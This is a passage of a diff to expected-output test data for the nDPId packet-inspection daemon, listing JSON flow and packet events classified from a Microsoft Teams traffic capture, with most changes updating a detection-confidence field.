{"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695422,"flow_last_seen":1587041695422,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695422,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1587041695422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1587041695422,"pkt":"KDc3AG3IEBMx8Tl2CABFAACY4AMAAG0Reyg0cvwIwKgBBg2Xw2AAhBBVAAEAaCESpEKBJ1p+KLNk2I89FPkABgAJRlkzMjpvNS9JAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/n+gJUACN6qKWcI9wj8gDcABAAAAAIACAAUyAS6wVT6GpHQ1gnRXe5kbQ9LDuWAKAAEokvlFA=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695422,"flow_last_seen":1587041695422,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695422,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695422,"flow_last_seen":1587041695422,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695422,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2685,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1587041695432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1587041695432,"pkt":"EBMx8Tl2KDc3AG3ICABFAACA0aoAAEARtpnAqAEGNHL8CMNgDZcAbO2O\/xAAYN6qKWcI9wj8AQEARCESpEKBJ1p+KLNk2I89FPmAcAAEAAAABwAgAAgAASyFFWBYSoA3AAQAAAACgDYABAAAAAEACAAUmYtT\/sgffZE\/GPjMTGRSk5h1N+2AKAAEPqesNg=="} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2688,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1587041695433,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1587041695433,"pkt":"EBMx8Tl2KDc3AG3ICABFAACAFs8AAEARcWjAqAEGNHL8FcN0DZgAbMYz\/xAAYGUfNM4ueRX8AQEARCESpEK59F1PLtIJs2rQCYqAcAAEAAAABwAgAAgAASyKFWBYV4A3AAQAAAACgDYABAAAAAEACAAUb+d2GMvNHhGxBtT1sjJNLSVYAvSAKAAEqoFJXQ=="} -00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2690,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1587041695435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2696,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMZh4AAEARkejAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2697,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMyucAAEARLR\/AqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2699,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041695611} @@ -499,102 +507,103 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1587041697061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041697061,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyYAbtVmTcwAAAAALAC\/\/8wcwAAAgQFtAEDAwUBAQgKMITmwQAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1587041697091,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041697091,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8X+VAAG4GOLAoT4opwKgBBgG77Jhhqm+9VZk3MaASIADeAQAAAgQFoAEDAwgEAggKC\/ZmGDCE5sE="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1587041697091,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041697091,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyYAbtVmTcxYapvvoAQEAkclQAAAQEICjCE5t4L9mYY"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041697061,"flow_last_seen":1587041697092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041697092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041697061,"flow_last_seen":1587041697092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041697092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00896{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2734,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041697061,"flow_last_seen":1587041697123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1679,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1587041697123,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041697412} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041697244,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2761,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041697611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2761,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041697604,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1587041697660,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1587041697660,"pkt":"KDc3AG3IEBMx8Tl2CABFoAA40fgAADUBJWpdR27NwKgBBgMDcCsAAAAARQAASh2AAAAyEd1gwKgBBl1Hbs3DdD\/NADaJWQ=="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2774,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1587041697673,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1587041697673,"pkt":"KDc3AG3IEBMx8Tl2CABFoAA4akMAADUBjR9dR27NwKgBBgMDcBsAAAAARQAAWp4wAAAyEVygwKgBBl1Hbs3DdD\/NAEaJWQ=="} -00931{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041693828,"flow_last_seen":1587041694047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6930,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00824{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693582,"flow_last_seen":1587041694243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":220,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041697660,"flow_last_seen":1587041697673,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00930{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1587041693849,"flow_last_seen":1587041697765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7358,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1587041676435,"flow_last_seen":1587041676536,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12621,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1300,"flow_first_seen":1587041677243,"flow_last_seen":1587041697130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":750126,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041682144,"flow_last_seen":1587041685098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9034,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1587041685240,"flow_last_seen":1587041685471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":30424,"flow_avg_l4_payload_len":585,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685984,"flow_last_seen":1587041686156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8124,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00931{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041693828,"flow_last_seen":1587041694047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6930,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00824{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00824{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1587041693582,"flow_last_seen":1587041694243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":220,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 